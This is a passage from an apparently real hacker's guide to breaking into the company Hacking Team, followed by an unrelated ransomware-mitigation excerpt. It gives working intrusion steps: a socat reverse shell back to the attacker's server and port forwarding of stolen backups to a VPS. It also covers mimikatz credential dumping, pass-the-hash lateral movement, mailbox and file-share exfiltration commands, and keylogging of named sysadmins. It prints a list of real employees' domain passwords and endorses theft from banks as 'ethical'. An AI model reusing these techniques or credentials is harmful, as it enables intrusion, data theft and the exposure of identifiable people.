[8] https://github.com/robertdavidgraham/masscan
[9] http://www.morningstarsecurity.com/research/whatweb
[10] http://blindelephant.sourceforge.net/


----[ 4.2 - Social Information ]------------------------------------------------

For social engineering, it's useful to have information about the employees,
their roles, contact information, operating system, browser, plugins,
software, etc. Some resources are:

1) Google

   Here as well, it's the most useful tool.

2) theHarvester and recon-ng

   I already mentioned them in the previous section, but they have a lot more
   functionality. They can find a lot of information quickly and
   automatically. It's worth reading all their documentation.

3) LinkedIn

   A lot of information about the employees can be found here. The company's
   recruiters are the most likely to accept your connection requests.

4) Data.com

   Previously known as jigsaw. They have contact information for many
   employees.

5) File Metadata

   A lot of information about employees and their systems can be found in
   metadata of files the company has published. Useful tools for finding
   files on the company's website and extracting the metadata are metagoofil
   [1] and FOCA [2].

[1] https://github.com/laramies/metagoofil
[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html


--[ 5 - Entering the network ]--------------------------------------------------

There are various ways to get a foothold. Since the method I used against
Hacking Team is uncommon and a lot more work than is usually necessary, I'll
talk a little about the two most common ways, which I recommend trying first.


----[ 5.1 - Social Engineering ]------------------------------------------------

Social engineering, specifically spear phishing, is responsible for the
majority of hacks these days. For an introduction in Spanish, see [1]. For
more information in English, see [2] (the third part, "Targeted Attacks"). For
fun stories about the social engineering exploits of past generations, see
[3]. I didn't want to try to spear phish Hacking Team, as their whole business
is helping governments spear phish their opponents, so they'd be much more
likely to recognize and investigate a spear phishing attempt.

[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf


----[ 5.2 - Buying Access ]-----------------------------------------------------

Thanks to hardworking Russians and their exploit kits, traffic sellers, and
bot herders, many companies already have compromised computers in their
networks. Almost all of the Fortune 500, with their huge networks, have some
bots already inside. However, Hacking Team is a very small company, and most
of it's employees are infosec experts, so there was a low chance that they'd
already been compromised.


----[ 5.3 - Technical Exploitation ]--------------------------------------------

After the Gamma Group hack, I described a process for searching for
vulnerabilities [1]. Hacking Team had one public IP range:
inetnum:        93.62.139.32 - 93.62.139.47
descr:          HT public subnet

Hacking Team had very little exposed to the internet. For example, unlike
Gamma Group, their customer support site needed a client certificate to
connect. What they had was their main website (a Joomla blog in which Joomscan
[2] didn't find anything serious), a mail server, a couple routers, two VPN
appliances, and a spam filtering appliance. So, I had three options: look for
a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
embedded devices. A 0day in an embedded device seemed like the easiest option,
and after two weeks of work reverse engineering, I got a remote root exploit.
Since the vulnerabilities still haven't been patched, I won't give more
details, but for more information on finding these kinds of vulnerabilities,
see [3] and [4].

[1] http://pastebin.com/raw.php?i=cRYvK4jb
[2] http://sourceforge.net/projects/joomscan/
[3] http://www.devttys0.com/
[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A


--[ 6 - Be Prepared ]-----------------------------------------------------------

I did a lot of work and testing before using the exploit against Hacking Team.
I wrote a backdoored firmware, and compiled various post-exploitation tools
for the embedded device. The backdoor serves to protect the exploit. Using the
exploit just once and then returning through the backdoor makes it harder to
identify and patch the vulnerabilities.

The post-exploitation tools that I'd prepared were:

1) busybox

   For all the standard Unix utilities that the system didn't have.

2) nmap

   To scan and fingerprint Hacking Team's internal network.

3) Responder.py

   The most useful tool for attacking windows networks when you have access to
   the internal network, but no domain user.

4) Python

   To execute Responder.py

5) tcpdump

   For sniffing traffic.

6) dsniff

   For sniffing passwords from plaintext protocols like ftp, and for
   arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR
   and NaGA, but it was hard to compile it for the system.

7) socat

   For a comfortable shell with a pty:
   my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
   hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
    tcp:my_server:my_port

   And useful for a lot more, it's a networking swiss army knife. See the
   examples section of its documentation.

8) screen

   Like the shell with pty, it wasn't really necessary, but I wanted to feel
   at home in Hacking Team's network.

9) a SOCKS proxy server

   To use with proxychains to be able to access their local network from any
   program.

10) tgcd

   For forwarding ports, like for the SOCKS server, through the firewall.

[1] https://www.busybox.net/
[2] https://nmap.org/
[3] https://github.com/SpiderLabs/Responder
[4] https://github.com/bendmorris/static-python
[5] http://www.tcpdump.org/
[6] http://www.monkey.org/~dugsong/dsniff/
[7] http://www.dest-unreach.org/socat/
[8] https://www.gnu.org/software/screen/
[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
[10] http://tgcd.sourceforge.net/


The worst thing that could happen would be for my backdoor or post-exploitation
tools to make the system unstable and cause an employee to investigate. So I
spent a week testing my exploit, backdoor, and post-exploitation tools in the
networks of other vulnerable companies before entering Hacking Team's network.


--[ 7 - Watch and Listen ]------------------------------------------------------

Now inside their internal network, I wanted to take a look around and think
about my next step. I started Responder.py in analysis mode (-A to listen
without sending poisoned responses), and did a slow scan with nmap.


--[ 8 - NoSQL Databases ]-------------------------------------------------------

NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
community [1]. Just when I was worried that they'd finally patched all of the
authentication bypass bugs in MySQL [2][3][4][5], new databases came into
style that lack authentication by design. Nmap found a few in Hacking Team's
internal network:

27017/tcp open  mongodb       MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|   totalSize = 49856643072
...
|_    version = 2.6.5

27017/tcp open  mongodb       MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 31987
|   totalSize = 33540800512
|   databases
...
|_    version = 2.6.5

They were the databases for test instances of RCS. The audio that RCS records
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
from this. They were spying on themselves without meaning to.

[1] https://www.shodan.io/search?query=product%3Amongodb
[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
[6] https://ht.transparencytoolkit.org/audio/


--[ 9 - Crossed Cables ]--------------------------------------------------------

Although it was fun to listen to recordings and see webcam images of Hacking
Team developing their malware, it wasn't very useful. Their insecure backups
were the vulnerability that opened their doors. According to their
documentation [1], their iSCSI devices were supposed to be on a separate
network, but nmap found a few in their subnetwork 192.168.1.200/24:

Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
...
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:ht-synology.name
|     Address: 192.168.200.66:3260,0
|_    Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
...
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:synology-backup.name
|     Address: 10.0.1.72:3260,0
|     Address: 192.168.200.72:3260,0
|_    Authentication: No authentication required

iSCSI needs a kernel module, and it would've been difficult to compile it for
the embedded system. I forwarded the port so that I could mount it from a VPS:

VPS: tgcd -L -p 3260 -q 42838
Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it
because it thinks its IP is 192.168.200.72 instead of 127.0.0.1

The way I solved it was:
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

And now, after:
iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

...the device file appears! We mount it:
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

and find backups of various virtual machines. The Exchange server seemed like
the most interesting. It was too big too download, but it was possible to
mount it remotely to look for interesting files:
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1            2048  1258287103   629142528    7  HPFS/NTFS/exFAT

so the offset is 2048 * 512 = 1048576
$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/

now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
we find the hard disk of the VM, and mount it:
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

...and finally we've unpacked the Russian doll and can see all the files from
the old Exchange server in /mnt/part1

[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf


--[ 10 - From backups to domain admin ]-----------------------------------------

What interested me most in the backup was seeing if it had a password or hash
that could be used to access the live server. I used pwdump, cachedump, and
lsadump [1] on the registry hives. lsadump found the password to the besadmin
service account:

_SC_BlackBerry MDS Connection Service
0000   16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0010   62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00    b.e.s.3.2.6.7.8.
0020   21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00    !.!.!...........

I used proxychains [2] with the socks server on the embedded device and
smbclient [3] to check the password:
proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'

It worked! The password for besadmin was still valid, and a local admin. I
used my proxy and metasploit's psexec_psh [4] to get a meterpreter session.
Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and
got a bunch of passwords, including the Domain Admin:

HACKINGTEAM  BESAdmin       bes32678!!!
HACKINGTEAM  Administrator  uu8dd8ndd12!
HACKINGTEAM  c.pozzi        P4ssword      <---- lol great sysadmin
HACKINGTEAM  m.romeo        ioLK/(90
HACKINGTEAM  l.guerra       4luc@=.=
HACKINGTEAM  d.martinez     W4tudul3sp
HACKINGTEAM  g.russo        GCBr0s0705!
HACKINGTEAM  a.scarafile    Cd4432996111
HACKINGTEAM  r.viscardi     Ht2015!
HACKINGTEAM  a.mino         A!e$$andra
HACKINGTEAM  m.bettini      Ettore&Bella0314
HACKINGTEAM  m.luppi        Blackou7
HACKINGTEAM  s.gallucci     1S9i8m4o!
HACKINGTEAM  d.milan        set!dob66
HACKINGTEAM  w.furlan       Blu3.B3rry!
HACKINGTEAM  d.romualdi     Rd13136f@#
HACKINGTEAM  l.invernizzi   L0r3nz0123!
HACKINGTEAM  e.ciceri       2O2571&2E
HACKINGTEAM  e.rabe         erab@4HT!

[1] https://github.com/Neohapsis/creddump7
[2] http://proxychains.sourceforge.net/
[3] https://www.samba.org/
[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
[5] https://github.com/gentilkiwi/mimikatz


--[ 11 - Downloading the mail ]-------------------------------------------------

With the Domain Admin password, I have access to the email, the heart of the
company. Since with each step I take there's a chance of being detected, I
start downloading their email before continuing to explore. Powershell makes
it easy [1]. Curiously, I found a bug with Powershell's date handling. After
downloading the emails, it took me another couple weeks to get access to the
source code and everything else, so I returned every now and then to download
the new emails. The server was Italian, with dates in the format
day/month/year. I used:
-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}

with New-MailboxExportRequest to download the new emails (in this case all
mail since June 5). The problem is it says the date is invalid if you
try a day larger than 12 (I imagine because in the US the month comes first
and you can't have a month above 12). It seems like Microsoft's engineers only
test their software with their own locale.

[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/


--[ 12 - Downloading Files ]----------------------------------------------------

Now that I'd gotten Domain Admin, I started to download file shares using my
proxy and the -Tc option of smbclient, for example:

proxychains smbclient '//192.168.1.230/FAE DiskStation' \
    -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'

I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in
the torrent like that.


--[ 13 - Introduction to hacking windows domains ]------------------------------

Before continuing with the story of the "weones culiaos" (Hacking Team), I
should give some general knowledge for hacking windows networks.


----[ 13.1 - Lateral Movement ]-------------------------------------------------

I'll give a brief review of the different techniques for spreading withing a
windows network. The techniques for remote execution require the password or
hash of a local admin on the target. By far, the most common way of obtaining
those credentials is using mimikatz [1], especially sekurlsa::logonpasswords
and sekurlsa::msv, on the computers where you already have admin access. The
techniques for "in place" movement also require administrative privileges
(except for runas). The most important tools for privilege escalation are
PowerUp [2], and bypassuac [3].

[1] https://adsecurity.org/?page_id=1821
[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1


Remote Movement:

1) psexec

   The tried and true method for lateral movement on windows. You can use
   psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's
   invoke_psexec [4], or the builtin windows command "sc" [5]. For the
   metasploit module, powershell empire, and pth-winexe [6], you just need the
   hash, not the password. It's the most universal method (it works on any
   windows computer with port 445 open), but it's also the least stealthy.
   Event type 7045 "Service Control Manager" will appear in the event logs. In
   my experience, no one has ever noticed during a hack, but it helps the
   investigators piece together what the hacker did afterwards.

2) WMI

   The most stealthy method. The WMI service is enabled on all windows
   computers, but except for servers, the firewall blocks it by default. You
   can use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and
   pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin
   wmic [5]. All except wmic just need the hash.

3) PSRemoting [10]

   It's disabled by default, and I don't recommend enabling new protocols.
   But, if the sysadmin has already enabled it, it's very convenient,
   especially if you use powershell for everything (and you should use
   powershell for almost everything, it will change [11] with powershell 5 and
   windows 10, but for now powershell makes it easy to do everything in RAM,
   avoid AV, and leave a small footprint)

4) Scheduled Tasks

   You can execute remote programs with at and schtasks [5]. It works in the
   same situations where you could use psexec, and it also leaves a well known
   footprint [12].

5) GPO

   If all those protocols are disabled or blocked by the firewall, once you're
   Domain Admin, you can use GPO to give users a login script, install an msi,
   execute a scheduled task [13], or, like we'll see with the computer of
   Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and
   open the firewall.

[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
[2] https://sourceforge.net/projects/winexe/
[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
[4] http://www.powershellempire.com/?page_id=523
[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
[6] https://github.com/byt3bl33d3r/pth-toolkit
[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
[8] https://www.trustedsec.com/june-2015/no_psexec_needed/
[9] http://www.powershellempire.com/?page_id=124
[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
[11] https://adsecurity.org/?p=2277
[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py


"In place" Movement:

1) Token Stealing

   Once you have admin access on a computer, you can use the tokens of the
   other users to access resources in the domain. Two tools for doing this are
   incognito [1] and the mimikatz token::* commands [2].

2) MS14-068

   You can take advantage of a validation bug in Kerberos to generate Domain
   Admin tickets [3][4][5].

3) Pass the Hash

   If you have a user's hash, but they're not logged in, you can use
   sekurlsa::pth [2] to get a ticket for the user.

4) Process Injection

   Any RAT can inject itself into other processes. For example, the migrate
   command in meterpreter and pupy [6], or the psinject [7] command in
   powershell empire. You can inject into the process that has the token you
   want.

5) runas

   This is sometimes very useful since it doesn't require admin privileges.
   The command is part of windows, but if you don't have a GUI you can use
   powershell [8].

[1] https://www.indetectables.net/viewtopic.php?p=211165
[2] https://adsecurity.org/?page_id=1821
[3] https://github.com/bidord/pykek
[4] https://adsecurity.org/?p=676
[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
[6] https://github.com/n1nj4sec/pupy
[7] http://www.powershellempire.com/?page_id=273
[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1


----[ 13.2 - Persistence ]------------------------------------------------------

Once you have access, you want to keep it. Really, persistence is only a
challenge for assholes like Hacking Team who target activists and other
individuals. To hack companies, persistence isn't needed since companies never
sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple
high-uptime servers. On the off chance that they all reboot at the same time,
I have passwords and a golden ticket [1] as backup access. You can read more
about the different techniques for persistence in windows here [2][3][4]. But
for hacking companies, it's not needed and it increases the risk of detection.

[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
[3] http://www.hexacorn.com/blog/category/autostart-persistence/
[4] https://blog.netspi.com/tag/persistence/


----[ 13.3 - Internal reconnaissance ]------------------------------------------

The best tool these days for understanding windows networks is Powerview [1].
It's worth reading everything written by it's author [2], especially [3], [4],
[5], and [6]. Powershell itself is also quite powerful [7]. As there are still
many windows 2000 and 2003 servers without powershell, you also have to learn
the old school [8], with programs like netview.exe [9] or the windows builtin
"net view". Other techniques that I like are:

1) Downloading a list of file names

   With a Domain Admin account, you can download a list of all filenames in
   the network with powerview:

   Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
   select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
   select fullname | out-file -append files.txt}

   Later, you can read it at your leisure and choose which files to download.

2) Reading email

   As we've already seen, you can download email with powershell, and it has a
   lot of useful information.

3) Reading sharepoint

   It's another place where many businesses store a lot of important
   information. It can also be downloaded with powershell [10].

4) Active Directory [11]

   It has a lot of useful information about users and computers. Without being
   Domain Admin, you can already get a lot of info with powerview and other
   tools [12]. After getting Domain Admin, you should export all the AD
   information with csvde or another tool.

5) Spy on the employees

   One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi
   (one of Hacking Team's sysadmins) gave me access to a Nagios server which
   gave me access to the rete sviluppo (development network with the source
   code of RCS). With a simple combination of Get-Keystrokes and
   Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang
   [14], and GPO, you can spy on any employee, or even on the whole domain.

[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
[2] http://www.harmj0y.net/blog/tag/powerview/
[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
[6] http://www.slideshare.net/harmj0y/i-have-the-powerview
[7] https://adsecurity.org/?p=2535
[8] https://www.youtube.com/watch?v=rpwrKhgMd7E
[9] https://github.com/mubix/netview
[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
[11] https://adsecurity.org/?page_id=41
[12] http://www.darkoperator.com/?tag=Active+Directory
[13] https://github.com/PowerShellMafia/PowerSploit
[14] https://github.com/samratashok/nishang


--[ 14 - Hunting Sysadmins ]----------------------------------------------------

Reading their documentation about their infrastructure [1], I saw that I was
still missing access to something important - the "Rete Sviluppo", an isolated
network with the source code for RCS. The sysadmins of a company always have
access to everything, so I searched the computers of Mauro Romeo and Christian
Pozzi to see how they administer the Sviluppo network, and to see if there
were any other interesting systems I should investigate. It was simple to
access their computers, since they were part of the windows domain where I'd
already gotten admin access. Mauro Romeo's computer didn't have any ports
open, so I opened the port for WMI [2] and executed meterpreter [3]. In
addition to keylogging and screen scraping with Get-Keystrokes and
Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1
[4], and searched for interesting files [5]. Upon seeing that Pozzi had a
Truecrypt volume, I waited until he'd mounted it and then copied off the
files. Many have made fun of Christian Pozzi's weak passwords (and of
Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I
included them in the leak as a false clue, and to laugh at him. The reality is
that mimikatz and keyloggers view all passwords equally.

[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
[2] http://www.hammer-software.com/wmigphowto.shtml
[3] https://www.trustedsec.com/june-2015/no_psexec_needed/
[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
[5] http://pwnwiki.io/#!presence/windows/find_files.md
[6] http://archive.is/TbaPy
[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/


--[ 15 - The bridge ]-----------------------------------------------------------

Within Christian Pozzi's Truecrypt volume, there was a textfile with many
passwords [1]. One of those was for a Fully Automated Nagios server, which had
access to the Sviluppo network in order to monitor it. I'd found the bridge I
needed. The textfile just had the password to the web interface, but there was
a public code execution exploit [2] (it's an unauthenticated exploit, but it
requires that at least one user has a session initiated, for which I used the
password from the textfile).

[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
[2] http://seclists.org/fulldisclosure/2014/Oct/78


--[ 16 - Reusing and resetting passwords ]--------------------------------------

Reading the emails, I'd seen Daniele Milan granting access to git repos. I
already had his windows password thanks to mimikatz. I tried it on the git
server and it worked. Then I tried sudo and it worked. For the gitlab server
and their twitter account, I used the "forgot my password" function along with
my access to their mail server to reset the passwords.


--[ 17 - Conclusion ]-----------------------------------------------------------

That's all it takes to take down a company and stop their human rights abuses.
That's the beauty and asymmetry of hacking: with 100 hours of work, one person
can undo years of work by a multi-million dollar company. Hacking gives the
underdog a chance to fight and win.

Hacking guides often end with a disclaimer: this information is for
educational purposes only, be an ethical hacker, don't attack systems you
don't have permission to, etc. I'll say the same, but with a more rebellious
conception of "ethical" hacking. Leaking documents, expropriating money from
banks, and working to secure the computers of ordinary people is ethical
hacking. However, most people that call themselves "ethical hackers" just work
to secure those who pay their high consulting fees, who are often those most
deserving to be hacked.

Hacking Team saw themselves as part of a long line of inspired Italian design
[1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri,
and government, as part of a long tradition of Italian fascism. I'd like to
dedicate this guide to the victims of the raid on the Armando Diaz school, and
to all those who have had their blood spilled by Italian fascists.

[1] https://twitter.com/coracurrier/status/618104723263090688


--[ 18 - Contact ]--------------------------------------------------------------

To send me spear phishing attempts, death threats in Italian [1][2], and to
give me 0days or access inside banks, corporations, governments, etc.

[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
[2] https://twitter.com/CthulhuSec/status/619459002854977537

only encrypted email please:
https://securityinabox.org/es/thunderbird_usarenigmail
-----BEGIN PGP PUBLIC KEY BLOCK-----

mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
+fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
=E5+y
-----END PGP PUBLIC KEY BLOCK-----



                      If not you, who? If not now, when?
                _   _            _      ____             _    _ 
               | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
               | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
               |  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
               |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)

mitigating ransome ware

From http://blog.talosintel.com/2016/04/ransomware.html#more

 Preventing Initial Access


There are things can be done to prevent the attack before it even starts. If the attackers cannot establish initial access in the target network easily, this increases the likelihood that attackers will seek easier prey elsewhere. Our attackers are opportunistic and are looking to turn about a profit with as little effort as possible. If initial access cannot be easily established, this increases the likelihood they will seek out easier prey. Initial access usually comes in one of two forms: Exploitation of public-facing services, or phishing/social engineering.

DMZ Hardening tips


DMZ hardening amounts to a couple of key housekeeping and maintenance tasks:
  • Periodic port scans: Port scans can be utilized to map one's DMZ and gain a better view on actual services and operating systems an organization is exposing to the internet. Once you have a collection of exposed services, you can map the public addresses to private addresses, determine who owns the asset(s) and/or whether or not exposure of the service(s) is even necessary. The lower the number of services exposed to the public internet, the lower the attack surface available.
  • Vulnerability scans/remediation: Once publicly exposed services have been verified, utilize vulnerability scanners against the exposed services. Remediate findings as soon as possible.
  • Regular system maintenance:
    • Find and following system hardening guidelines, such as DISA's STIG[41]
    • Ensure that regular patch maintenance is being performed.
    • Ensure that DMZ system logs are being exported to a log collector/SIEM
    • Any publicly exposed systems/services that require authentication should require strong passwords; Consider implementing two-factor authentication (where possible) instead.
    • Any publicly exposed systems/services that require authentication should have rate limiting, or blocking based on the number of failed guesses to limit the success of brute force attacks

Mitigating Phishing/Social Engineering


While preventing initial access through phishing or social engineering is much more difficult, there are actions that can be taken to mitigate the risks:
  • Consider investing in a company-sanctioned file-sharing program for exchanging files between users in the organization and/or company partners. Utilizing a file-sharing solution, and instructing users to never share or accept files over email can almost completely mitigate phishing attacks utilizing attachments. Instruct your users that the mail server isn't for file exchange, nor is it meant for archiving files.
  • Inform users that do not have to regularly work with macro-enabled office documents to never enable macros. In fact, the majority of your userbase has no requirement to work with macros, disable office macros through group policy, only enabling them for business units with a specific need[42]. For those business units that cannot operate without office macros, consider digitally signed macros to further mitigate that risk.
  • Some phishing attacks are delivered through PDFs and will specifically target vulnerabilities in certain PDF reader applications (e.g. Adobe Reader) to achieve code execution. Consider using an alternative PDF reader and disabling extra functionality (e.g. javascript in PDF).
  • Ensure the email scanning gateways disallow sending and receiving executable files (exe, dll, cpl, scr), javascript (.js files) office documents with macros, and scans .zip files for contents.
  • Enforce checking/verifying SPF records to mitigate spoofed e-mails.
  • Ensure that you have a mail gateway solution that is updated with information on the latest phishing domains (e.g. senderbase, etc.)
  • More often than not, the new gTLDs, as well as dynamic DNS domains are heavily abused in malware campaigns due to how inexpensive they are to acquire. In most cases, they can be blacklisted with little to nothing worry about; they tend to have a very low business relevance. Blacklist dynamic DNS and gTLDs default, whitelist individual domains as required, and only if there is a specific business need.
  • Instruct users to trust but verify, especially for any messages from outside the company with attachments. Simply asking the sender "Did you send this?" Over the phone prior to opening the attachment is all it takes.
  • If users are in any way concerned that they have been phished, instruct them to report the incident. The users shouldn't fear your SOC or security department and should NOT be punished for reporting security incidents.
  • Notify users that IT and/or Security will never ask them for their passwords to reduce the effectiveness of phishing attacks that are attempting to gather user credentials.
  • Disallow the mounting of USB drives. This mitigates the "print my resume for me scenario" as well mitigating self-propagating malware that attempts to jump air gaps through compromised USB drives. If removable media cannot be disabled across the enterprise, at a minimum disable autorun for removable media via GPO, and instruct employees to never accept or use thumb drives from untrusted sources. Instruct users that all thumb drives should be scanned for viruses upon insertion and before users access the files; consider configuring antivirus to perform automatic on-access scans for any USB drives plugged into systems. If utilizing thumb drives in a sensitive airgapped environment is required, consider keeping a collection of thumb drives, tagging them as company assets and signing them out on each use.
